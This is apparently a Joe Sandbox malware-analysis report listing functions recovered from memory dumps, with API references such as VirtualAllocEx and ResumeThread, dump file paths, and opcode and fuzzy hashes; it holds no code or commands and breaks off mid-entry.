API String ID: 1029625771-0
Opcode ID: 98c19fc9ff9850c99fc8044e86bd7b0044ae8d0485ba67ccddb0354ceaad7887
Instruction ID: 7fd9594152c5f69aab59a57737ef01cc567c443d10e8bf635694474151439dd6
Opcode Fuzzy Hash: 98c19fc9ff9850c99fc8044e86bd7b0044ae8d0485ba67ccddb0354ceaad7887
Instruction Fuzzy Hash: C311FFB69002498FDB10CF9AC844ADEBBF4AB88610F10842AD969A7300C379A549CFA5

Function 0910CB30 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 0910CB9E

Memory Dump Source

Source File: 0000000C.00000002.4680104220.0000000009100000.00000040.00000800.00020000.00000000.sdmp, Offset: 09100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_9100000_file.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 9efb47c1b01379e27aaf7a111a0cbd594dfbb554a66220699dc654a705b39d4a
Instruction ID: 4b4001cb437d2b1ea2006083039bdd6dcd7d3e83f501a6764cb27270271f283b
Opcode Fuzzy Hash: 9efb47c1b01379e27aaf7a111a0cbd594dfbb554a66220699dc654a705b39d4a
Instruction Fuzzy Hash: A11114719003499FDB10DFAAC845BDFBBF5AF88314F148419E555A7250C7799540CFA4

Function 0910D8B0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32 ref: 0910D912

Memory Dump Source

Source File: 0000000C.00000002.4680104220.0000000009100000.00000040.00000800.00020000.00000000.sdmp, Offset: 09100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_9100000_file.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: f95c6098946cce75967fde7a38484e2f36359374150f9f2c227ebc25229a349a
Instruction ID: 7715141e16801237a6927af109dc53e1606c6646a8952b49e32b37fb96348695
Opcode Fuzzy Hash: f95c6098946cce75967fde7a38484e2f36359374150f9f2c227ebc25229a349a
Instruction Fuzzy Hash: CC113675D003498FEB10DFAAC4457AFFBF4EF88724F248419D519A7240CB79A944CBA4

Function 06328640 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 063286A6

Memory Dump Source

Source File: 0000000C.00000002.4678128294.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6320000_file.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 7c36e50939e35d2e4ccb99674354b35a459a99d3d8bdb58f739de8aa9a9cd3e5
Instruction ID: f0c10110267e311e9d3a56d8663be89d53b110e9660ebc87e7aa448f1dc766c3
Opcode Fuzzy Hash: 7c36e50939e35d2e4ccb99674354b35a459a99d3d8bdb58f739de8aa9a9cd3e5
Instruction Fuzzy Hash: 24110FB6C007498FDB10CF9AC844ADEFBF4AB88210F10841AD919B7200C379A549CFA5

Function 079C0DD3 Relevance: 1.4, Strings: 1, Instructions: 110COMMON

Download Yara Rule

Strings

D, xrefs: 079C0E2A

Memory Dump Source

Source File: 0000000C.00000002.4679523585.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_79c0000_file.jbxd

Similarity

API ID:
String ID: D
API String ID: 0-2746444292
Opcode ID: 7fa95510c13af5991c5455fcd96c91bb11d078a475750279dc5265369b4c0418
Instruction ID: dadd849fdf34dc0075ed863ce05c51c4d457bde252070fd54bace7acb81e8a55
Opcode Fuzzy Hash: 7fa95510c13af5991c5455fcd96c91bb11d078a475750279dc5265369b4c0418
Instruction Fuzzy Hash: A431489144E3C69FCB0387789C646967F70AE53214B1A05EBC4D1CF6E3E658090AC7A7

Function 079CA191 Relevance: .5, Instructions: 471COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4679523585.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_79c0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce54654cba7a78dec74bacb33c1a81aac4df8a7bc8ff747d99203b8332f25ec4
Instruction ID: 64ce0841f00f31df9460e72bdde9f8c64d8cfe5c23fd5ebf1e88dfb577d6bdc8
Opcode Fuzzy Hash: ce54654cba7a78dec74bacb33c1a81aac4df8a7bc8ff747d99203b8332f25ec4
Instruction Fuzzy Hash: 24F1D370B192558FCB08FFB9E99966E7BF1FF89200F408869D449EB350DA38AC45C791

Function 00B88828 Relevance: .4, Instructions: 445COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4652185019.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b80000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff840da71f4cdde84804290d8ac43ea6956835ba77ffb41c46353251d1403ca5
Instruction ID: 33cc8f2b45635af3f0b44b8c8fdb673355ea0bb0d54043152cc1f2bc50694a70
Opcode Fuzzy Hash: ff840da71f4cdde84804290d8ac43ea6956835ba77ffb41c46353251d1403ca5
Instruction Fuzzy Hash: BB122C30A00209DFDB14EF69D984AAEBBF2FF49314F5485A9E5099B3A1DB31ED41CB50

Function 00B88DA8 Relevance: .4, Instructions: 436COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4652185019.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b80000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc2f3a467d040d51c66c790c0ba6c3e4aa400e5c965f0c4bb33d3679cbbf863d
Instruction ID: 1382ea4cf5e7f4b3db37d8709c63ca4a3223ba896a98f26ab2b7a541ee951381
Opcode Fuzzy Hash: dc2f3a467d040d51c66c790c0ba6c3e4aa400e5c965f0c4bb33d3679cbbf863d
Instruction Fuzzy Hash: A602F970600205DFCF15EF68C984AAEBBF2FB98301F1A8595E406DB2A5D734ED81CB65

Function 079CBA73 Relevance: .4, Instructions: 434COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4679523585.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_79c0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 306cc7432788dce9b38802db80669a04024600f40fc4d07a1b8661ea2ceefcde
Instruction ID: a3ace50f07a2c52db8fca9c81224ab460e39ae9cf7e62484ce0899219d6fe5ca
Opcode Fuzzy Hash: 306cc7432788dce9b38802db80669a04024600f40fc4d07a1b8661ea2ceefcde
Instruction Fuzzy Hash: 63F14C70E15315CFCB08AFB8F9592AD7BB2EF89740F40446AD44AE7354EB345C458B62

Function 079CAE6C Relevance: .4, Instructions: 368COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4679523585.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_79c0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0823a0670af594d1620772149ccc8bd1e65037ec57a4b209fbac7db5182c0532
Instruction ID: ca22460f5ec124b8429892315367e6abb854e36ec8f92a2ac6c9b9676ff3cbc6
Opcode Fuzzy Hash: 0823a0670af594d1620772149ccc8bd1e65037ec57a4b209fbac7db5182c0532
Instruction Fuzzy Hash: DED1D1B0B152558FCB08FBB9E89A26E7BB2FF89200F404569D449EB394DF389C45C761

Function 079C9BD8 Relevance: .4, Instructions: 366COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4679523585.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_79c0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e83f66223a20a5ae540eb5bbaa4b13289409a9d72b13c9143298de4b6a7c9efe
Instruction ID: 4214b195f31280f9e0845c3735a653f286d6939b6bb466f7f82ca1b1073934dd
Opcode Fuzzy Hash: e83f66223a20a5ae540eb5bbaa4b13289409a9d72b13c9143298de4b6a7c9efe
Instruction Fuzzy Hash: 1CC1AF71B18315CFCB08FBB9E89A27E7BB1EF89200F414969D489EB354DE389845C791

Function 079CB4FB Relevance: .3, Instructions: 348COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4679523585.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_79c0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcd4a6cd644d3c6b439752dfb68c0f5a93f6584d106a2460d13ee62d9f64967d
Instruction ID: 421bea9e66a3f802efc532a12c4dbf3b4a46e1229e4c35a6bad6cc8d037a6018
Opcode Fuzzy Hash: fcd4a6cd644d3c6b439752dfb68c0f5a93f6584d106a2460d13ee62d9f64967d
Instruction Fuzzy Hash: E8C19FB0B15244CFCB08FFB9E89A66D7BF6EF89200F414469E459EB360DE389845CB51

Function 00B86FB9 Relevance: .3, Instructions: 291COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4652185019.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b80000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58dd92cfcdbe504d35a26281db0e1ee26b45afa654c346130691274aabf89166
Instruction ID: 39c23f67953dc4117e3f77bdcbb61e077350f49bb31092b5e01efbfa7309880f
Opcode Fuzzy Hash: 58dd92cfcdbe504d35a26281db0e1ee26b45afa654c346130691274aabf89166
Instruction Fuzzy Hash: 4FA1DF307042159FDB15AF64D858BAE7BE6EB88350F248469F90ADB3A1CF70DC41CBA5

Function 079C9BAC Relevance: .3, Instructions: 284COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4679523585.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_79c0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c73758bab381ab2eac14047012a52333c2e3d01e7c7c34fa6c2bc556757f58
Instruction ID: 65dbcd169d20a0ce3ef6873b0804b8ce7e0a66cf93976bd3abc1ca5ed2a6ead6
Opcode Fuzzy Hash: d6c73758bab381ab2eac14047012a52333c2e3d01e7c7c34fa6c2bc556757f58
Instruction Fuzzy Hash: E8A1C071A19355CFCB04FBB8E89927E7BF1AF89200F444479D489DB354DA389849C7A1

Function 00B88823 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4652185019.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b80000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21c44a64878256b05c73f0fcbc58165239440ead86e0715d2a43c5f66bba91c5
Instruction ID: 50777ad63c1537c3d92e801df6b2c975c6aa2dcb08a324668b7bcc80cce58497
Opcode Fuzzy Hash: 21c44a64878256b05c73f0fcbc58165239440ead86e0715d2a43c5f66bba91c5
Instruction Fuzzy Hash: 3CC13C30A00209DFCB14EF69D884AAEBBF2FF48314F5485A9E559AB261DB31ED40CF50

Function 079CD368 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4679523585.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_79c0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9e415d9052b0926fb52b8d8754504e464c6773329237c6158a04dd4a1bfe8fe
Instruction ID: 39fa6c5b9a5d105c4bc554f09438f347a55f03b451e3065234561c27225c2f05
Opcode Fuzzy Hash: c9e415d9052b0926fb52b8d8754504e464c6773329237c6158a04dd4a1bfe8fe
Instruction Fuzzy Hash: 5A91AFB0B15601CFCB04FBB9E99966E77F6EF89200F408869D449EB354DB389C44C7A2

Function 079CA7E6 Relevance: .2, Instructions: 245COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4679523585.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_79c0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc4ce883d2e883c7f815c5cd3765e854cb8c0b9657805a9950df01e8200ce358
Instruction ID: 8ba1d40a0e0611f3ae1d82008000e8d01a3a76e3461da59909d04c3b0c6a6f80
Opcode Fuzzy Hash: fc4ce883d2e883c7f815c5cd3765e854cb8c0b9657805a9950df01e8200ce358
Instruction Fuzzy Hash: 85711B7060D3D58FCB06A778E86926D7FB2EF46104F4945ABD1C5DB292CA384C49C3A2

Function 079CD02C Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4679523585.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_79c0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72977f733bc667ba7f50427b9130070e736a9ed29f390856a12223612d6d9487
Instruction ID: 8b2c1edccdb619fafe31753093e9edb7cb68e9760366a38c90f4111fd362c807
Opcode Fuzzy Hash: 72977f733bc667ba7f50427b9130070e736a9ed29f390856a12223612d6d9487
Instruction Fuzzy Hash: 3571E471B192558FCB04FBB9EC9A66EBBB1AF89200F404579D489E7354DE389C48C3D2

Function 00B876B8 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4652185019.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b80000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02db287a6fb4034e175be814f74d533dd0c6443992f3ba4bd94576588bba55ad
Instruction ID: 1907062a8587c6e6bd5d6d169f988db952722aba1a363e0a02702afa59605559
Opcode Fuzzy Hash: 02db287a6fb4034e175be814f74d533dd0c6443992f3ba4bd94576588bba55ad
Instruction Fuzzy Hash: B7715A35A485058FCB14EF6AC88896DBBF2FF89308B3581A9D515A7375DB31EC41CBA0

Function 079CA854 Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4679523585.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_79c0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e69bfa638db5f5202f0c7c2b70bcf477ee948af45a8283c4383257b11f2d766
Instruction ID: bed7ed919215a626434feec24635d37b2c2ff3a81a786c9f667b8cfe580c7bf4
Opcode Fuzzy Hash: 9e69bfa638db5f5202f0c7c2b70bcf477ee948af45a8283c4383257b11f2d766
Instruction Fuzzy Hash: EE513970B092458FCB08BBB9E89A26E7FF2EF85200F44456AD085DB291DE384C45C3D2

Function 00B8A34F Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4652185019.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b80000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 149f602344bd4200aa6610d385e97d576aa19760f15b18c27cf14bb0cc079f76
Instruction ID: 03b83d6ad58d0988d848364575d0e02fef514797de1c15491ad9c041210031ea
Opcode Fuzzy Hash: 149f602344bd4200aa6610d385e97d576aa19760f15b18c27cf14bb0cc079f76
Instruction Fuzzy Hash: 3F5172317042048FEB15AF65D898BADBBE6EB88710B18449BE416DB3A1DA70DC41CB66

Function 079CA897 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4679523585.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_79c0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9e3cbb15096ad273164acc5755d081741540eb94ae0b435167d580ad20028c2
Instruction ID: 4caab2f3db6ff0611da4c4d9a84c3af923c90148dfdee266257df1a20cf85c8e
Opcode Fuzzy Hash: e9e3cbb15096ad273164acc5755d081741540eb94ae0b435167d580ad20028c2
Instruction Fuzzy Hash: 0451F630B092458FCB08BBB9E99A66E7FF6EF85200F44456AD185DB250DE385C45C3E2

Function 00B872C0 Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4652185019.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b80000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3403767b9b3cc28e4e18b72b6aaff6843b6c8f6d03dcb3815b181ae3a108755
Instruction ID: 0f636b74ce3e30e49d211aafd101f3478ffc83fabb59e99aecec96501b6cbd7d
Opcode Fuzzy Hash: d3403767b9b3cc28e4e18b72b6aaff6843b6c8f6d03dcb3815b181ae3a108755
Instruction Fuzzy Hash: 944192303083118FDB15AB75D8A472E7BE7AB89304F2444A9D546CB3A5DF74CC42D796

Function 079CA8C0 Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4679523585.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_79c0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b0ea8ce7cae4485948275850d295a92045688b913fd32dd6055f82afb948629
Instruction ID: f08111b92caafd92b6929a9c276cb781ca076493f46df2284dc4a2bf0e4fe414
Opcode Fuzzy Hash: 3b0ea8ce7cae4485948275850d295a92045688b913fd32dd6055f82afb948629
Instruction Fuzzy Hash: 7141D470B152198FCB08BBB9E99A67E7BF6EF88200F44492DD149EB240DE385D44C7D6

Function 00B8FBB0 Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4652185019.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b80000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f66df4d52be1090935fd9887f4420de83e3d8cb9cd2f33ca0e3f97e517b27a5
Instruction ID: 5e29c51a37f2fcc03d5aba42b000857e9b7661a0f9b641f8c4c612aafd4a9049
Opcode Fuzzy Hash: 6f66df4d52be1090935fd9887f4420de83e3d8cb9cd2f33ca0e3f97e517b27a5
Instruction Fuzzy Hash: 674138343006068FDB64EE29C894B7977E6FF89710F1584B9E95ACB271DA34ED41CB50

Function 00B8A478 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4652185019.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b80000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da40064c782d379781edd4a7019ec58c0c41f1bc9fe3a5af6817c43e6f623ad1
Instruction ID: 3b178ed5037a1f6b4c835b4095bafc17ae901da2be4bb96119996d34725a8296
Opcode Fuzzy Hash: da40064c782d379781edd4a7019ec58c0c41f1bc9fe3a5af6817c43e6f623ad1
Instruction Fuzzy Hash: DF4193317002148FDB14AB69D854BAE7BF6EFC9710F1444AAE50AD73A1DE749C02CBA1

Function 079CABBE Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4679523585.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_79c0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aca033d0d16d79e6604d25bd39fd3da2dc131e6ea29deac1267d9656149f6168
Instruction ID: bfc09f3a5a68ffe6289e4a7a0e50dfae86a7bab15dfe740b34c5991683415d45
Opcode Fuzzy Hash: aca033d0d16d79e6604d25bd39fd3da2dc131e6ea29deac1267d9656149f6168
Instruction Fuzzy Hash: 965167B09043898FDF15CFA8C854B9DBFB5EF4A314F04815EE455AB2A1C7749841CB92

Function 079CABE8 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4679523585.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_79c0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc17816af05f1d8594fdf18530d5ba67cc5c91e367cfb30c525d5279c65eace2
Instruction ID: e4395e726caa230478685abb34899d404bff80bd74e645100815b518c0d054e4
Opcode Fuzzy Hash: fc17816af05f1d8594fdf18530d5ba67cc5c91e367cfb30c525d5279c65eace2
Instruction Fuzzy Hash: 36410FB0D002499FDF14DFA9C884BAEBBF5EF48314F14842DE819AB364D774A841CB96

Function 00B893B0 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4652185019.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b80000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a41cc39972b7b8239a3d4ecb6aaa6e13cba9ea2dcc19a0bfc3c153ef05dc8d98
Instruction ID: 0a6319161eceafae832367cba7f8a992f354df775767cb894fa0827c50528844
Opcode Fuzzy Hash: a41cc39972b7b8239a3d4ecb6aaa6e13cba9ea2dcc19a0bfc3c153ef05dc8d98
Instruction Fuzzy Hash: D5410774600219DFCB14AF69D888AAA7BB5FB88711F1840A9E916CB3B0CB31DC41DB61

Function 00B880F0 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4652185019.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b80000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54c60a0ec0cd34a31ce3bc4e53baec521b584d2058749c8b3a5cb265c31faf70
Instruction ID: 80a620eca6262415a844fb149e4dd6a87b63ba0acfa66f80e3fff006fa155b1d
Opcode Fuzzy Hash: 54c60a0ec0cd34a31ce3bc4e53baec521b584d2058749c8b3a5cb265c31faf70
Instruction Fuzzy Hash: 0B41B231A00208DFDB14EF54D848BAABBF6FB48301F5484AAE915AB261DF75DD45CBA0

Function 079CAA9E Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4679523585.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_79c0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b6b5bcc97ce77b4248f9cc16355acfba6703b533f37c7a97f30b6e88a34b360
Instruction ID: 5121d57b603d00944f56e25ae2a645ba9985344f6d7834a668e0fefe6fa9283d
Opcode Fuzzy Hash: 5b6b5bcc97ce77b4248f9cc16355acfba6703b533f37c7a97f30b6e88a34b360
Instruction Fuzzy Hash: E1316C30A0D3854FD701A7B9AC9956EBFB1EF47124F0942AAC4D5DB292D6384C0AC3B2

Function 00B86090 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4652185019.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b80000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0c4cdb74f9db2c6e25d8410b275645698ae942821c2b8ef8018e6f882f27777
Instruction ID: a35bd3d62ff69147590b029c68ece0637e561075ac9cb8238a3d12dda7c657d4
Opcode Fuzzy Hash: e0c4cdb74f9db2c6e25d8410b275645698ae942821c2b8ef8018e6f882f27777
Instruction Fuzzy Hash: C63183317042199FCB05BF64E89876E7BE2FB88314F1081A8F9199B366CB35DD61DB60

Function 00B896E0 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4652185019.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b80000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20cbe367379962fb6d4eba8d174e2964abed6771e58eeb0c73eb308a8e91f537
Instruction ID: 2332dc30c9c393375ea94639c53148a59c7fd292fd9c498246a7a8cf90337d00
Opcode Fuzzy Hash: 20cbe367379962fb6d4eba8d174e2964abed6771e58eeb0c73eb308a8e91f537
Instruction Fuzzy Hash: A73191793282858FDF14EF65D884ABB7BE9EB85310B2C44A6F856CB264DB70DC41C760

Function 00B897E0 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4652185019.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b80000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd767732230569028adf62fa315359d6ef7dc56e46665d63bdcb9bf31231ab4d
Instruction ID: a5724273825f6ff96ae0f60a4deff0f98af383664358120a41c21b93ed7d3a97
Opcode Fuzzy Hash: cd767732230569028adf62fa315359d6ef7dc56e46665d63bdcb9bf31231ab4d
Instruction Fuzzy Hash: 9621A4307042025BEF192A26889477E31DADFC6B98F1C40B5D606CB3B4DA25CC41D391

Function 00B897DD Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4652185019.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b80000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4a724759406dbf790bdf5bb528ce7e4dadcce0e53bea73bed4ebcf21d2bf794
Instruction ID: c181cfab7c3775b96ebecec2c04249c6c1d60b7ea400de7ff6197efb9ef9ca0d
Opcode Fuzzy Hash: f4a724759406dbf790bdf5bb528ce7e4dadcce0e53bea73bed4ebcf21d2bf794
Instruction Fuzzy Hash: 8821D7317042025FEF292B36989863D36DADFC6B98B1C40B9D606CB3B5EA25CC41D791

Function 079CCF30 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4679523585.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_79c0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2a267952eaf51bcc378ddea24afc4f329ea24e6d982343ab886078fc9444e58
Instruction ID: 3b1fa692639f1666f9412153ba9897eb620ab59c13b3efd25340fea56db65568
Opcode Fuzzy Hash: f2a267952eaf51bcc378ddea24afc4f329ea24e6d982343ab886078fc9444e58
Instruction Fuzzy Hash: 5F21D071B192518FC704F7B8EC9567E7BBAAF89210F444969E048DB340DA389C05C3A1

Function 00B8750F Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4652185019.0000000000B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b80000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af569a8e5f3cf4e067b44d6e62c415b5716526f83b5af031de04e892d9997816
Instruction ID: f78ca747e3353b9d121bae7d2eda966c22d70f4c1275b2a9b8b5cd3fd70d63b1
Opcode Fuzzy Hash: af569a8e5f3cf4e067b44d6e62c415b5716526f83b5af031de04e892d9997816
Instruction Fuzzy Hash: 41210A357496118FC716AB29D8A8A6EB7E2FF89B54B2541F9D50ACB361CF30DC01CB90

Function 079CCEF3 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4679523585.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_79c0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60db883ff43d39cfe9fbc3e487bfd20fa022e802a245222ed9aea77935130b92
